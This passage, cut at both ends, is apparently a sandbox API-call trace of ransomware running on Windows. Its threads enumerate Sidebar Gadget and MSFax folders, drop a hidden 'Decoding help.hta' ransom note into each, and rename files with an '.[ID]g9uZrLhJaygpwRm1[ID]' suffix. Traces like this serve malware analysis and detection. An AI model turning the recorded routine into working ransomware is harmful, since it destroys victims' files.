ftLastWriteTime.dwLowDateTime=0xa1b4ad62, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.905] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.905] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.905] FindNextFileW (in: hFindFile=0x671330, lpFindFileData=0x2915fd30 | out: lpFindFileData=0x2915fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8fefd96, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc8fefd96, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fb81591, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf14, dwReserved0=0x0, dwReserved1=0x0, cFileName="flyout.css", cAlternateFileName="")) returned 1 [0055.905] lstrcpyW (in: lpString1=0x5ca0398, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*" [0055.905] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*") returned 71 [0055.905] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\Decoding help.hta" [0055.905] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\decoding help.hta")) returned 0xffffffff [0055.905] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x958 [0057.415] WriteFile (in: hFile=0x958, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2915fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2915fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0057.415] CloseHandle (hObject=0x958) returned 1 [0057.416] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.416] lstrcmpiW (lpString1="Decoding help.hta", lpString2="flyout.css") returned -1 [0057.416] lstrlenW (lpString="flyout.css") returned 10 [0057.416] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*" [0057.416] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*") returned 71 [0057.416] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\", lpString2="flyout.css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\flyout.css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\flyout.css" [0057.416] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\flyout.css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\flyout.css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\flyout.css" [0057.416] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\flyout.css", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\flyout.css.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\flyout.css.[ID]g9uZrLhJaygpwRm1[ID]" [0057.416] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\flyout.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\flyout.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\flyout.css.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\flyout.css.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.838] FindNextFileW (in: hFindFile=0x671330, lpFindFileData=0x2915fd30 | out: lpFindFileData=0x2915fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fb81591, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x3fb81591, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x3fb81591, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x19ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.css", cAlternateFileName="")) returned 1 [0058.838] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*" [0058.838] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*") returned 71 [0058.838] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\Decoding help.hta" [0058.838] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\decoding help.hta")) returned 0x1 [0058.839] lstrcmpiW (lpString1="Decoding help.hta", lpString2="main.css") returned -1 [0058.839] lstrlenW (lpString="main.css") returned 8 [0058.839] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*" [0058.839] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*") returned 71 [0058.839] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\", lpString2="main.css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\main.css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\main.css" [0058.839] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\main.css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\main.css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\main.css" [0058.839] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\main.css", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\main.css.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\main.css.[ID]g9uZrLhJaygpwRm1[ID]" [0058.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\main.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\main.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\main.css.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\main.css.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.233] FindNextFileW (in: hFindFile=0x671330, lpFindFileData=0x2915fd30 | out: lpFindFileData=0x2915fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9015ef3, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc9015ef3, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fb81591, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x66c, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.css", cAlternateFileName="")) returned 1 [0059.234] lstrcpyW (in: lpString1=0x2ab59180, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*" [0059.234] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*") returned 71 [0059.234] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\Decoding help.hta" [0059.234] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\decoding help.hta")) returned 0x1 [0059.234] lstrcmpiW (lpString1="Decoding help.hta", lpString2="settings.css") returned -1 [0059.234] lstrlenW (lpString="settings.css") returned 12 [0059.234] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*" [0059.234] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*") returned 71 [0059.234] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\", lpString2="settings.css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\settings.css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\settings.css" [0059.234] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\settings.css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\settings.css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\settings.css" [0059.234] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\settings.css", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\settings.css.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\settings.css.[ID]g9uZrLhJaygpwRm1[ID]" [0059.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\settings.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\settings.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\settings.css.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\settings.css.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.234] FindNextFileW (in: hFindFile=0x671330, lpFindFileData=0x2915fd30 | out: lpFindFileData=0x2915fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9015ef3, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc9015ef3, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fb81591, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x66c, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.css", cAlternateFileName="")) returned 0 [0059.234] FindClose (in: hFindFile=0x671330 | out: hFindFile=0x671330) returned 1 Thread: id = 864 os_tid = 0xb98 [0054.774] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*", lpFindFileData=0x2929fd30 | out: lpFindFileData=0x2929fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc658 [0059.248] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.248] FindNextFileW (in: hFindFile=0x10fbc658, lpFindFileData=0x2929fd30 | out: lpFindFileData=0x2929fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.248] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.248] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.248] FindNextFileW (in: hFindFile=0x10fbc658, lpFindFileData=0x2929fd30 | out: lpFindFileData=0x2929fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0059.248] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0059.248] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0059.248] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0059.248] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*" [0059.248] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*.*") returned 67 [0059.248] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0059.249] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*.*" [0059.249] GlobalMemoryStatus (in: lpBuffer=0x2929fd10 | out: lpBuffer=0x2929fd10) [0059.249] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x98fa9e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f0 [0059.249] CloseHandle (hObject=0x5f0) returned 1 [0059.249] FindNextFileW (in: hFindFile=0x10fbc658, lpFindFileData=0x2929fd30 | out: lpFindFileData=0x2929fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0059.250] FindClose (in: hFindFile=0x10fbc658 | out: hFindFile=0x10fbc658) returned 1 Thread: id = 865 os_tid = 0x7bc [0054.784] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*", lpFindFileData=0x293dfd30 | out: lpFindFileData=0x293dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x819b78df, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x819b78df, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5e70 [0056.137] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.137] FindNextFileW (in: hFindFile=0x5a5e70, lpFindFileData=0x293dfd30 | out: lpFindFileData=0x293dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x819b78df, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x819b78df, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.137] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.137] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.137] FindNextFileW (in: hFindFile=0x5a5e70, lpFindFileData=0x293dfd30 | out: lpFindFileData=0x293dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb8048a8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbb8048a8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbb67725c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3129, dwReserved0=0x0, dwReserved1=0x0, cFileName="activity16v.png", cAlternateFileName="")) returned 1 [0056.582] lstrcpyW (in: lpString1=0x9872730, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0056.582] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0056.582] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0056.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0xffffffff [0056.582] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9e0 [0058.033] WriteFile (in: hFile=0x9e0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x293dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x293dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.034] CloseHandle (hObject=0x9e0) returned 1 [0058.034] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.035] lstrcmpiW (lpString1="Decoding help.hta", lpString2="activity16v.png") returned 1 [0058.035] lstrlenW (lpString="activity16v.png") returned 15 [0058.035] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0058.035] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0058.035] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="activity16v.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png" [0058.035] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png" [0058.035] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.035] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\activity16v.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\activity16v.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.041] FindNextFileW (in: hFindFile=0x5a5e70, lpFindFileData=0x293dfd30 | out: lpFindFileData=0x293dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb661993, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbb661993, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbb67725c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="add_down.png", cAlternateFileName="")) returned 1 [0059.041] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0059.041] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned 77 [0059.041] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" [0059.041] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\decoding help.hta")) returned 0x1 [0059.041] lstrcmpiW (lpString1="Decoding help.hta", lpString2="add_down.png") returned 1 [0059.041] lstrlenW (lpString="add_down.png") returned 12 [0059.041] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows 